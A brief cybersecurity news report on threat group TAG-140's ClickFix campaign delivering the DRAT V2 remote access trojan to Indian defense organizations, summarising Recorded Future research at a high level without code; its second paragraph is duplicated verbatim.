Threat operation TAG-140, which has been associated with Pakistan-linked hacking groups Transparent Tribe and SideCopy, has deployed the significantly improved DRAT V2 remote access trojan in a social engineering attack campaign with ClickFix tactics aimed at Indian defense organizations, Cyber Security News reports.
Attackers used spear-phishing to lure targets into visiting a fake Indian Ministry of Defense press release portal with a link for March 2025 press releases, which redirected to a specialized URI leading to clipboard hijacking, mshta.exe exploitation for remote script execution, and the subsequent delivery of the BroaderAspect loader that eventually downloads the Delphi-based DRAT V2 malware, a report from Recorded Future's Insikt Group researchers showed. DRAT V2 not only allowed remote access but also enabled arbitrary shell command execution with its new "exec_this_comm" command, facilitating more flexible post-exploitation activities. Researchers also found that DRAT V2 had its TCP-based command-and-control protocol improved to include ASCII and Unicode support.
Attackers used spear-phishing to lure targets into visiting a fake Indian Ministry of Defense press release portal with a link for March 2025 press releases, which redirected to a specialized URI leading to clipboard hijacking, mshta.exe exploitation for remote script execution, and the subsequent delivery of the BroaderAspect loader that eventually downloads the Delphi-based DRAT V2 malware, a report from Recorded Future's Insikt Group researchers showed. DRAT V2 not only allowed remote access but also enabled arbitrary shell command execution with its new "exec_this_comm" command, facilitating more flexible post-exploitation activities. Researchers also found that DRAT V2 had its TCP-based command-and-control protocol improved to include ASCII and Unicode support.
